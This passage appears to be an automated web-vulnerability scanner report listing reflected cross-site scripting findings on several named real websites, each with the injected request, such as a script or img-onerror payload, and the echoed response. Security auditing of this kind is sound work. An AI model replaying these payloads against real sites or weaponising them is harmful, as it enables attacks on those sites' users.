Host: driverbyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 21:46:52 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 05 Feb 2011 21:46:52 GMT
Expires: Sun, 27 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: rngine/2.x optimized/cached
Content-Length: 19317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download ga 81845
...[SNIP]...
<meta name="description" content="download ga 81845gv gigabyte vga driver72968\"><img src=a onerror=alert(1)>a36cb148e37 free drivers downloads: GIGABYTE GA-7VA Bios (Rev 2.0) 1.1 and other" />
...[SNIP]...

4.44. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://driverbyte.com
Path:   /download-ga-81845gv-gigabyte-vga-driver_freedownload

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8ed7<img%20src%3da%20onerror%3dalert(1)>ec91bc08206 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8ed7<img src=a onerror=alert(1)>ec91bc08206 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /download-ga-81845gv-gigabyte-vga-driver_freedownload?b8ed7<img%20src%3da%20onerror%3dalert(1)>ec91bc08206=1 HTTP/1.1
Host: driverbyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 21:46:42 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 05 Feb 2011 21:46:42 GMT
Expires: Sun, 27 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: rngine/2.x optimized/cached
Content-Length: 19400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download ga 81845
...[SNIP]...
<b>download ga 81845gv gigabyte vga driver?b8ed7<img src=a onerror=alert(1)>ec91bc08206=1</b>
...[SNIP]...

4.45. http://driverbyte.com/download-ga-81845gv-gigabyte-vga-driver_freedownload [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://driverbyte.com
Path:   /download-ga-81845gv-gigabyte-vga-driver_freedownload

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c5e"><img%20src%3da%20onerror%3dalert(1)>e0edaa08961 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a3c5e\"><img src=a onerror=alert(1)>e0edaa08961 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /download-ga-81845gv-gigabyte-vga-driver_freedownload?a3c5e"><img%20src%3da%20onerror%3dalert(1)>e0edaa08961=1 HTTP/1.1
Host: driverbyte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 21:46:36 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 05 Feb 2011 21:46:35 GMT
Expires: Sun, 27 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Powered-By: rngine/2.x optimized/cached
Content-Length: 19478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download ga 81845
...[SNIP]...
<meta name="description" content="download ga 81845gv gigabyte vga driver?a3c5e\"><img src=a onerror=alert(1)>e0edaa08961=1 free drivers downloads: GIGABYTE GA-7VA Bios (Rev 2.0) 1.1 and other" />
...[SNIP]...

4.46. http://ds.addthis.com/red/psi/sites/www.klivio.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.klivio.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7a43e<script>alert(1)</script>9a66bdcec19 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.klivio.com/p.json?callback=_ate.ad.hpr7a43e<script>alert(1)</script>9a66bdcec19&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.klivio.com%2F%3F34aa6%2522%253E%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Eceac919ade3%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F69&fb5wa3 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296924137.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 06 Feb 2011 16:16:53 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 08 Mar 2011 16:16:53 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 06 Feb 2011 16:16:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 16:16:53 GMT
Connection: close

_ate.ad.hpr7a43e<script>alert(1)</script>9a66bdcec19({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})

4.47. http://ecal.forexpros.com/e_cal.php [bg1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecal.forexpros.com
Path:   /e_cal.php

Issue detail

The value of the bg1 request parameter is copied into the HTML document as plain text between tags. The payload 6b18f<script>alert(1)</script>3e30c6ee661 was submitted in the bg1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF6b18f<script>alert(1)</script>3e30c6ee661&bg2=ECECEC&border=CEDBEB HTTP/1.1
Host: ecal.forexpros.com
Proxy-Connection: keep-alive
Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:26:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tc9icm70rmuv839h8bl7m5vf82; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107